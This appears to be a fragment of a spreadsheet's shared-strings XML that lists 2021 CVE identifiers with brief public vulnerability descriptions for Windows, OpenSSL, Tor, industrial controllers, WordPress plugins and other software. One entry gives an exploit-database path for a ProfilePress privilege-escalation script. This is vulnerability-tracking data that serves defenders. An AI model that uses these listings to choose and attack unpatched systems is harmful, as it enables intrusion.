    <t>Windows Certificate Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34493</t>
  </si>
  <si>
    <t>Windows Partition Management Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34494</t>
  </si>
  <si>
    <t>Windows DNS Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33746, CVE-2021-33754, CVE-2021-33780, CVE-2021-34525.</t>
  </si>
  <si>
    <t>CVE-2021-34496</t>
  </si>
  <si>
    <t>Windows GDI Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34497</t>
  </si>
  <si>
    <t>Windows MSHTML Platform Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34447.</t>
  </si>
  <si>
    <t>CVE-2021-34498</t>
  </si>
  <si>
    <t>Windows GDI Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34499</t>
  </si>
  <si>
    <t>Windows DNS Server Denial of Service Vulnerability This CVE ID is unique from CVE-2021-33745, CVE-2021-34442, CVE-2021-34444.</t>
  </si>
  <si>
    <t>CVE-2021-3450</t>
  </si>
  <si>
    <t>The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).</t>
  </si>
  <si>
    <t>CVE-2021-34500</t>
  </si>
  <si>
    <t>Windows Kernel Memory Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34501</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34518.</t>
  </si>
  <si>
    <t>CVE-2021-34503</t>
  </si>
  <si>
    <t>Microsoft Windows Media Foundation Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34439, CVE-2021-34441.</t>
  </si>
  <si>
    <t>CVE-2021-34504</t>
  </si>
  <si>
    <t>Windows Address Book Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34507</t>
  </si>
  <si>
    <t>Windows Remote Assistance Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34508</t>
  </si>
  <si>
    <t>Windows Kernel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34458.</t>
  </si>
  <si>
    <t>CVE-2021-34509</t>
  </si>
  <si>
    <t>Storage Spaces Controller Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3451</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in Lenovo PCManager, prior to version 3.0.400.3252, that could allow configuration files to be written to non-standard locations.</t>
  </si>
  <si>
    <t>CVE-2021-34510</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33751, CVE-2021-34460, CVE-2021-34512, CVE-2021-34513.</t>
  </si>
  <si>
    <t>CVE-2021-34511</t>
  </si>
  <si>
    <t>Windows Installer Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34512</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33751, CVE-2021-34460, CVE-2021-34510, CVE-2021-34513.</t>
  </si>
  <si>
    <t>CVE-2021-34513</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33751, CVE-2021-34460, CVE-2021-34510, CVE-2021-34512.</t>
  </si>
  <si>
    <t>CVE-2021-34514</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31979, CVE-2021-33771.</t>
  </si>
  <si>
    <t>CVE-2021-34516</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34449.</t>
  </si>
  <si>
    <t>CVE-2021-34517</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34518</t>
  </si>
  <si>
    <t>Microsoft Excel Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34501.</t>
  </si>
  <si>
    <t>CVE-2021-34519</t>
  </si>
  <si>
    <t>CVE-2021-3452</t>
  </si>
  <si>
    <t>A potential vulnerability in the system shutdown SMI callback function in some ThinkPad models may allow an attacker with local access and elevated privileges to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-34520</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34467, CVE-2021-34468.</t>
  </si>
  <si>
    <t>CVE-2021-34521</t>
  </si>
  <si>
    <t>Raw Image Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34522</t>
  </si>
  <si>
    <t>Microsoft Defender Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34464.</t>
  </si>
  <si>
    <t>CVE-2021-34523</t>
  </si>
  <si>
    <t>Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.</t>
  </si>
  <si>
    <t>CVE-2021-34524</t>
  </si>
  <si>
    <t>Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34525</t>
  </si>
  <si>
    <t>Windows DNS Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-33746, CVE-2021-33754, CVE-2021-33780, CVE-2021-34494.</t>
  </si>
  <si>
    <t>CVE-2021-34527</t>
  </si>
  <si>
    <t>CVE-2021-34528</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34529.</t>
  </si>
  <si>
    <t>CVE-2021-34529</t>
  </si>
  <si>
    <t>Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-34528.</t>
  </si>
  <si>
    <t>CVE-2021-3453</t>
  </si>
  <si>
    <t>Some Lenovo Notebook, ThinkPad, and Lenovo Desktop systems have BIOS modules unprotected by Intel Boot Guard that could allow an attacker with physical access the ability to write to the SPI flash storage.</t>
  </si>
  <si>
    <t>CVE-2021-34530</t>
  </si>
  <si>
    <t>Windows Graphics Component Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34532</t>
  </si>
  <si>
    <t>ASP.NET Core and Visual Studio Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34533</t>
  </si>
  <si>
    <t>Windows Graphics Component Font Parsing Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34534</t>
  </si>
  <si>
    <t>CVE-2021-34535</t>
  </si>
  <si>
    <t>Remote Desktop Client Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34536</t>
  </si>
  <si>
    <t>Storage Spaces Controller Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34537</t>
  </si>
  <si>
    <t>Windows Bluetooth Driver Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-34538</t>
  </si>
  <si>
    <t>Apache Hive before 3.1.3 "CREATE" and "DROP" function operations does not check for necessary authorization of involved entities in the query. It was found that an unauthorized user can manipulate an existing UDF without having the privileges to do so. This allowed unauthorized or underprivileged users to drop and recreate UDFs pointing them to new jars that could be potentially malicious.</t>
  </si>
  <si>
    <t>CVE-2021-34539</t>
  </si>
  <si>
    <t>An issue was discovered in CubeCoders AMP before 2.1.1.8. A lack of validation of the Java Version setting means that an unintended executable path can be set. The result is that high-privileged users can trigger code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3454</t>
  </si>
  <si>
    <t>Truncated L2CAP K-frame causes assertion failure. Zephyr versions &gt;= 2.4.0, &gt;= v.2.50 contain Improper Handling of Length Parameter Inconsistency (CWE-130), Reachable Assertion (CWE-617). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fx88-6c29-vrp3</t>
  </si>
  <si>
    <t>CVE-2021-34540</t>
  </si>
  <si>
    <t>Advantech WebAccess 8.4.2 and 8.4.4 allows XSS via the username column of the bwRoot.asp page of WADashboard.</t>
  </si>
  <si>
    <t>CVE-2021-34543</t>
  </si>
  <si>
    <t>The web administration server in Solar-Log 500 before 2.8.2 Build 52 does not require authentication, which allows remote attackers to gain administrative privileges by connecting to the server. As a result, the attacker can modify configuration files and change the system status.</t>
  </si>
  <si>
    <t>CVE-2021-34544</t>
  </si>
  <si>
    <t>An issue was discovered in Solar-Log 500 before 2.8.2 Build 52 23.04.2013. In /export.html, email.html, and sms.html, cleartext passwords are stored. This may allow sensitive information to be read by someone with access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-34546</t>
  </si>
  <si>
    <t>An unauthenticated attacker with physical access to a computer with NetSetMan Pro before 5.0 installed, that has the pre-logon profile switch button within the Windows logon screen enabled, is able to drop to an administrative shell and execute arbitrary commands as SYSTEM via the "save log to file" feature. To accomplish this, the attacker can navigate to cmd.exe.</t>
  </si>
  <si>
    <t>CVE-2021-34547</t>
  </si>
  <si>
    <t>PRTG Network Monitor 20.1.55.1775 allows /editsettings CSRF for user account creation.</t>
  </si>
  <si>
    <t>CVE-2021-34548</t>
  </si>
  <si>
    <t>An issue was discovered in Tor before 0.4.6.5, aka TROVE-2021-003. An attacker can forge RELAY_END or RELAY_RESOLVED to bypass the intended access control for ending a stream.</t>
  </si>
  <si>
    <t>CVE-2021-34549</t>
  </si>
  <si>
    <t>An issue was discovered in Tor before 0.4.6.5, aka TROVE-2021-005. Hashing is mishandled for certain retrieval of circuit data. Consequently. an attacker can trigger the use of an attacker-chosen circuit ID to cause algorithm inefficiency.</t>
  </si>
  <si>
    <t>CVE-2021-3455</t>
  </si>
  <si>
    <t>Disconnecting L2CAP channel right after invalid ATT request leads freeze. Zephyr versions &gt;= 2.4.0, &gt;= 2.5.0 contain Use After Free (CWE-416). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-7g38-3x9v-v7vp</t>
  </si>
  <si>
    <t>CVE-2021-34550</t>
  </si>
  <si>
    <t>An issue was discovered in Tor before 0.4.6.5, aka TROVE-2021-006. The v3 onion service descriptor parsing allows out-of-bounds memory access, and a client crash, via a crafted onion service descriptor</t>
  </si>
  <si>
    <t>CVE-2021-34551</t>
  </si>
  <si>
    <t>PHPMailer before 6.5.0 on Windows allows remote code execution if lang_path is untrusted data and has a UNC pathname.</t>
  </si>
  <si>
    <t>CVE-2021-34552</t>
  </si>
  <si>
    <t>Pillow through 8.2.0 and PIL (aka Python Imaging Library) through 1.1.7 allow an attacker to pass controlled parameters directly into a convert function to trigger a buffer overflow in Convert.c.</t>
  </si>
  <si>
    <t>CVE-2021-34553</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository Manager 3.x before 3.31.0 allows a remote authenticated attacker to get a list of blob files and read the content of a blob file (via a GET request) without having been granted access.</t>
  </si>
  <si>
    <t>CVE-2021-34555</t>
  </si>
  <si>
    <t>OpenDMARC 1.4.1 and 1.4.1.1 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a multi-value From header field.</t>
  </si>
  <si>
    <t>CVE-2021-34556</t>
  </si>
  <si>
    <t>In the Linux kernel through 5.13.7, an unprivileged BPF program can obtain sensitive information from kernel memory via a Speculative Store Bypass side-channel attack because the protection mechanism neglects the possibility of uninitialized memory locations on the BPF stack.</t>
  </si>
  <si>
    <t>CVE-2021-34557</t>
  </si>
  <si>
    <t>XScreenSaver 5.45 can be bypassed if the machine has more than ten disconnectable video outputs. A buffer overflow in update_screen_layout() allows an attacker to bypass the standard screen lock authentication mechanism by crashing XScreenSaver. The attacker must physically disconnect many video outputs.</t>
  </si>
  <si>
    <t>CVE-2021-34558</t>
  </si>
  <si>
    <t>The crypto/tls package of Go through 1.16.5 does not properly assert that the type of public key in an X.509 certificate matches the expected type when doing a RSA based key exchange, allowing a malicious TLS server to cause a TLS client to panic.</t>
  </si>
  <si>
    <t>CVE-2021-34559</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway &lt;= 3.0.8 a vulnerability may allow remote attackers to rewrite links and URLs in cached pages to arbitrary strings.</t>
  </si>
  <si>
    <t>CVE-2021-3456</t>
  </si>
  <si>
    <t>An improper authorization handling flaw was found in Foreman. The Salt plugin for the smart-proxy allows foreman clients to execute actions that should be limited to the Foreman Server. This flaw allows an authenticated local attacker to access and delete limited resources and also causes a denial of service on the Foreman server. The highest threat from this vulnerability is to integrity and system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34560</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway &lt;= 3.0.9 a form contains a password field with autocomplete enabled. The stored credentials can be captured by an attacker who gains control over the user's computer. Therefore the user must have logged in at least once.</t>
  </si>
  <si>
    <t>CVE-2021-34561</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway &lt;= 3.0.8 serious issue exists, if the application is not externally accessible or uses IP-based access restrictions. Attackers can use DNS Rebinding to bypass any IP or firewall based access restrictions that may be in place, by proxying through their target's browser.</t>
  </si>
  <si>
    <t>CVE-2021-34562</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 it is possible to inject arbitrary JavaScript into the application's response.</t>
  </si>
  <si>
    <t>CVE-2021-34563</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway 3.0.8 and 3.0.9 the HttpOnly attribute is not set on a cookie. This allows the cookie's value to be read or set by client-side JavaScript.</t>
  </si>
  <si>
    <t>1004</t>
  </si>
  <si>
    <t>CVE-2021-34564</t>
  </si>
  <si>
    <t>Any cookie-stealing vulnerabilities within the application or browser would enable an attacker to steal the user's credentials to the PEPPERL+FUCHS WirelessHART-Gateway 3.0.9.</t>
  </si>
  <si>
    <t>315</t>
  </si>
  <si>
    <t>CVE-2021-34565</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway 3.0.7 to 3.0.9 the SSH and telnet services are active with hard-coded credentials.</t>
  </si>
  <si>
    <t>CVE-2021-34566</t>
  </si>
  <si>
    <t>In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to crash the iocheck process and write memory resulting in loss of integrity and DoS.</t>
  </si>
  <si>
    <t>CVE-2021-34567</t>
  </si>
  <si>
    <t>In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to provoke a denial of service and an limited out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2021-34568</t>
  </si>
  <si>
    <t>In WAGO I/O-Check Service in multiple products an unauthenticated remote attacker can send a specially crafted packet containing OS commands to provoke a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-34569</t>
  </si>
  <si>
    <t>In WAGO I/O-Check Service in multiple products an attacker can send a specially crafted packet containing OS commands to crash the diagnostic tool and write memory.</t>
  </si>
  <si>
    <t>CVE-2021-3457</t>
  </si>
  <si>
    <t>An improper authorization handling flaw was found in Foreman. The Shellhooks plugin for the smart-proxy allows Foreman clients to execute actions that should be limited to the Foreman Server. This flaw allows an authenticated local attacker to access and delete limited resources and also causes a denial of service on the Foreman server. The highest threat from this vulnerability is to integrity and system availability.</t>
  </si>
  <si>
    <t>CVE-2021-34570</t>
  </si>
  <si>
    <t>Multiple Phoenix Contact PLCnext control devices in versions prior to 2021.0.5 LTS are prone to a DoS attack through special crafted JSON requests.</t>
  </si>
  <si>
    <t>CVE-2021-34571</t>
  </si>
  <si>
    <t>Multiple Wireless M-Bus devices by Enbra use Hard-coded Credentials in Security mode 5 without an option to change the encryption key. An adversary can learn all information that is available in Enbra EWM.</t>
  </si>
  <si>
    <t>CVE-2021-34572</t>
  </si>
  <si>
    <t>Enbra EWM 1.7.29 does not check for or detect replay attacks sent by wireless M-Bus Security mode 5 devices. Instead timestamps of the sensor are replaced by the time of the readout even if the data is a replay of earlier data.</t>
  </si>
  <si>
    <t>CVE-2021-34573</t>
  </si>
  <si>
    <t>In Enbra EWM in Version 1.7.29 together with several tested wireless M-Bus Sensors the events backflow and "no flow" are not reconized or misinterpreted. This may lead to wrong values and missing events.</t>
  </si>
  <si>
    <t>CVE-2021-34574</t>
  </si>
  <si>
    <t>In MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2 an authenticated attacker can change the password of his account into a new password that violates the password policy by intercepting and modifying the request that is send to the server.</t>
  </si>
  <si>
    <t>CVE-2021-34575</t>
  </si>
  <si>
    <t>In MB connect line mymbCONNECT24, mbCONNECT24 in versions &lt;= 2.8.0 an unauthenticated user can enumerate valid users by checking what kind of response the server sends.</t>
  </si>
  <si>
    <t>CVE-2021-34576</t>
  </si>
  <si>
    <t>In Kaden PICOFLUX Air in all known versions an information exposure through observable discrepancy exists. This may give sensitive information (water consumption without distinct values) to third parties.</t>
  </si>
  <si>
    <t>CVE-2021-34577</t>
  </si>
  <si>
    <t>In the Kaden PICOFLUX AiR water meter an adversary can read the values through wireless M-Bus mode 5 with a hardcoded shared key while being adjacent to the device.</t>
  </si>
  <si>
    <t>CVE-2021-34578</t>
  </si>
  <si>
    <t>This vulnerability allows an attacker who has access to the WBM to read and write settings-parameters of the device by sending specifically constructed requests without authentication on multiple WAGO PLCs in firmware versions up to FW07.</t>
  </si>
  <si>
    <t>CVE-2021-34579</t>
  </si>
  <si>
    <t>In Phoenix Contact: FL MGUARD DM version 1.12.0 and 1.13.0 access to the Apache web server being installed as part of the FL MGUARD DM on Microsoft Windows does not require login credentials even if configured during installation.Attackers with network access to the Apache web server can download and therefore read mGuard configuration profiles (“ATV profiles”). Such configuration profiles may contain sensitive information, e.g. private keys associated with IPsec VPN connections.</t>
  </si>
  <si>
    <t>CVE-2021-3458</t>
  </si>
  <si>
    <t>The Motorola MM1000 device configuration portal can be accessed without authentication, which could allow adapter settings to be modified.</t>
  </si>
  <si>
    <t>CVE-2021-34580</t>
  </si>
  <si>
    <t>In mymbCONNECT24, mbCONNECT24 &lt;= 2.9.0 an unauthenticated user can enumerate valid backend users by checking what kind of response the server sends for crafted invalid login attempts.</t>
  </si>
  <si>
    <t>CVE-2021-34581</t>
  </si>
  <si>
    <t>Missing Release of Resource after Effective Lifetime vulnerability in OpenSSL implementation of WAGO 750-831/xxx-xxx, 750-880/xxx-xxx, 750-881, 750-889 in versions FW4 up to FW15 allows an unauthenticated attacker to cause DoS on the device.</t>
  </si>
  <si>
    <t>CVE-2021-34582</t>
  </si>
  <si>
    <t>In Phoenix Contact FL MGUARD 1102 and 1105 in Versions 1.4.0, 1.4.1 and 1.5.0 a user with high privileges can inject HTML code (XSS) through web-based management or the REST API with a manipulated certificate file.</t>
  </si>
  <si>
    <t>CVE-2021-34583</t>
  </si>
  <si>
    <t>Crafted web server requests may cause a heap-based buffer overflow and could therefore trigger a denial-of- service condition due to a crash in the CODESYS V2 web server prior to V1.1.9.22.</t>
  </si>
  <si>
    <t>CVE-2021-34584</t>
  </si>
  <si>
    <t>Crafted web server requests can be utilised to read partial stack or heap memory or may trigger a denial-of- service condition due to a crash in the CODESYS V2 web server prior to V1.1.9.22.</t>
  </si>
  <si>
    <t>126</t>
  </si>
  <si>
    <t>CVE-2021-34585</t>
  </si>
  <si>
    <t>In the CODESYS V2 web server prior to V1.1.9.22 crafted web server requests can trigger a parser error. Since the parser result is not checked under all conditions, a pointer dereference with an invalid address can occur. This leads to a denial of service situation.</t>
  </si>
  <si>
    <t>CVE-2021-34586</t>
  </si>
  <si>
    <t>In the CODESYS V2 web server prior to V1.1.9.22 crafted web server requests may cause a Null pointer dereference in the CODESYS web server and may result in a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-34587</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions a long URL could lead to webserver crash. The URL is used as input of an sprintf to a stack variable.</t>
  </si>
  <si>
    <t>CVE-2021-34588</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to unprotected data export. Backup export is protected via a random key. The key is set at user login. It is empty after reboot .</t>
  </si>
  <si>
    <t>CVE-2021-34589</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to an RFID leak. The RFID of the last charge event can be read without authentication via the web interface.</t>
  </si>
  <si>
    <t>CVE-2021-3459</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability was reported in the MM1000 device configuration web server, which could allow privileged shell access and/or arbitrary privileged commands to be executed on the adapter.</t>
  </si>
  <si>
    <t>CVE-2021-34590</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to Cross-site Scripting. An authenticated attacker could write HTML Code into configuration values. These values are not properly escaped when displayed.</t>
  </si>
  <si>
    <t>CVE-2021-34591</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to Local privilege Escalation. An authenticated attacker could get root access via the suid applications socat, ip udhcpc and ifplugd.</t>
  </si>
  <si>
    <t>CVE-2021-34592</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. An authenticated attacker could enter shell commands into some input fields.</t>
  </si>
  <si>
    <t>CVE-2021-34593</t>
  </si>
  <si>
    <t>In CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56 unauthenticated crafted invalid requests may result in several denial-of-service conditions. Running PLC programs may be stopped, memory may be leaked, or further communication clients may be blocked from accessing the PLC.</t>
  </si>
  <si>
    <t>CVE-2021-34594</t>
  </si>
  <si>
    <t>TwinCAT OPC UA Server in TF6100 and TS6100 in product versions before 4.3.48.0 or with TcOpcUaServer versions below 3.2.0.194 are prone to a relative path traversal that allow administrators to create or delete any files on the system.</t>
  </si>
  <si>
    <t>CVE-2021-34595</t>
  </si>
  <si>
    <t>A crafted request with invalid offsets may cause an out-of-bounds read or write access in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition or local memory overwrite.</t>
  </si>
  <si>
    <t>CVE-2021-34596</t>
  </si>
  <si>
    <t>A crafted request may cause a read access to an uninitialized pointer in CODESYS V2 Runtime Toolkit 32 Bit full and PLCWinNT prior to versions V2.4.7.56, resulting in a denial-of-service condition.</t>
  </si>
  <si>
    <t>CVE-2021-34597</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in PC Worx Automation Suite of Phoenix Contact up to version 1.88 could allow an attacker with a manipulated project file to unpack arbitrary files outside of the selected project directory.</t>
  </si>
  <si>
    <t>CVE-2021-34598</t>
  </si>
  <si>
    <t>In Phoenix Contact FL MGUARD 1102 and 1105 in Versions 1.4.0, 1.4.1 and 1.5.0 the remote logging functionality is impaired by the lack of memory release for data structures from syslog-ng when remote logging is active</t>
  </si>
  <si>
    <t>CVE-2021-34599</t>
  </si>
  <si>
    <t>Affected versions of CODESYS Git in Versions prior to V1.1.0.0 lack certificate validation in HTTPS handshakes. CODESYS Git does not implement certificate validation by default, so it does not verify that the server provides a valid and trusted HTTPS certificate. Since the certificate of the server to which the connection is made is not properly verified, the server connection is vulnerable to a man-in-the-middle attack.</t>
  </si>
  <si>
    <t>CVE-2021-3460</t>
  </si>
  <si>
    <t>The Motorola MH702x devices, prior to version 2.0.0.301, do not properly verify the server certificate during communication with the support server which could lead to the communication channel being accessible by an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-34600</t>
  </si>
  <si>
    <t>Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.</t>
  </si>
  <si>
    <t>CVE-2021-34601</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to Hardcoded Credentials. Bender charge controller CC612 in version 5.20.1 and below is prone to hardcoded ssh credentials. An attacker may use the password to gain administrative access to the web-UI.</t>
  </si>
  <si>
    <t>CVE-2021-34602</t>
  </si>
  <si>
    <t>In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. An authenticated attacker could enter shell commands into some input fields that are executed with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-34605</t>
  </si>
  <si>
    <t>A zip slip vulnerability in XINJE XD/E Series PLC Program Tool up to version v3.5.1 can provide an attacker with arbitrary file write privilege when opening a specially-crafted project file. This vulnerability can be triggered by manually opening an infected project file, or by initiating an upload program request from an infected Xinje PLC. This can result in remote code execution, information disclosure and denial of service of the system running the XINJE XD/E Series PLC Program Tool.</t>
  </si>
  <si>
    <t>CVE-2021-34606</t>
  </si>
  <si>
    <t>A vulnerability exists in XINJE XD/E Series PLC Program Tool in versions up to v3.5.1 that can allow an authenticated, local attacker to load a malicious DLL. Local access is required to successfully exploit this vulnerability. This means the potential attacker must have access to the system and sufficient file-write privileges. If exploited, the attacker could place a malicious DLL file on the system, that when running XINJE XD/E Series PLC Program Tool will allow the attacker to execute arbitrary code with the privileges of another user's account.</t>
  </si>
  <si>
    <t>CVE-2021-34609</t>
  </si>
  <si>
    <t>A remote SQL injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): Prior to 6.10.0, 6.9.6 and 6.8.9. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3461</t>
  </si>
  <si>
    <t>A flaw was found in keycloak where keycloak may fail to logout user session if the logout request comes from external SAML identity provider and Principal Type is set to Attribute [Name].</t>
  </si>
  <si>
    <t>CVE-2021-34610</t>
  </si>
  <si>
    <t>A remote arbitrary command execution vulnerability was discovered in Aruba ClearPass Policy Manager version(s): Prior to 6.10.0, 6.9.6 and 6.8.9. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34611</t>
  </si>
  <si>
    <t>CVE-2021-34612</t>
  </si>
  <si>
    <t>CVE-2021-34613</t>
  </si>
  <si>
    <t>CVE-2021-34614</t>
  </si>
  <si>
    <t>CVE-2021-34615</t>
  </si>
  <si>
    <t>CVE-2021-34616</t>
  </si>
  <si>
    <t>CVE-2021-34617</t>
  </si>
  <si>
    <t>A remote cross-site scripting (XSS) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.13 and below; Aruba Instant 6.5.x: 6.5.4.13 and below; Aruba Instant 8.3.x: 8.3.0.7 and below; Aruba Instant 8.4.x: 8.4.0.5 and below; Aruba Instant 8.5.x: 8.5.0.0 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34618</t>
  </si>
  <si>
    <t>A remote denial of service (DoS) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.18 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.4.x: All versions; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-34619</t>
  </si>
  <si>
    <t>The WooCommerce Stock Manager WordPress plugin is vulnerable to Cross-Site Request Forgery leading to Arbitrary File Upload in versions up to, and including, 2.5.7 due to missing nonce and file validation in the /woocommerce-stock-manager/trunk/admin/views/import-export.php file.</t>
  </si>
  <si>
    <t>CVE-2021-3462</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability in Lenovo Power Management Driver for Windows 10, prior to version 1.67.17.54, that could allow unauthorized access to the driver's device object.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50242.sh</t>
  </si>
  <si>
    <t>WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)</t>
  </si>
  <si>
    <t>CVE-2021-34620</t>
  </si>
  <si>
    <t>The WP Fluent Forms plugin &lt; 3.6.67 for WordPress is vulnerable to Cross-Site Request Forgery leading to stored Cross-Site Scripting and limited Privilege Escalation due to a missing nonce check in the access control function for administrative AJAX actions</t>
  </si>
  <si>
    <t>CVE-2021-34621</t>
  </si>
  <si>
    <t>A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .</t>
  </si>
  <si>
    <t>CVE-2021-34622</t>
  </si>
  <si>
    <t>A vulnerability in the user profile update component found in the ~/src/Classes/EditUserProfile.php file of the ProfilePress WordPress plugin made it possible for users to escalate their privileges to that of an administrator while editing their profile. This issue affects versions 3.0.0 - 3.1.3. .</t>
  </si>
  <si>
    <t>CVE-2021-34623</t>
  </si>
  <si>
